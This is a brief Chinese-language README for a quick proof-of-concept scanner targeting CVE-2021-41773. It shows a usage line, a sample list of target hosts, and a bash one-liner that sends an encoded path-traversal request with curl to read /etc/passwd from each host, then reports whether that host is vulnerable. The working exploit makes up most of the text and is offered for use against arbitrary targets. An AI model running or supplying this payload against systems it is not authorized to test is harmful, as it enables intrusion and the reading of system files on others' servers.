一个快速简陋的概念验证,用于检查主机是否易受CVE-2021-41773攻击
python3 full.py hosts.txt
其中hosts.txt包含你的目标:
domain.com
blah.com
192.168.1.1
它会打印出主机是否易受攻击。
bash的Python版本:
cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
祝您好运!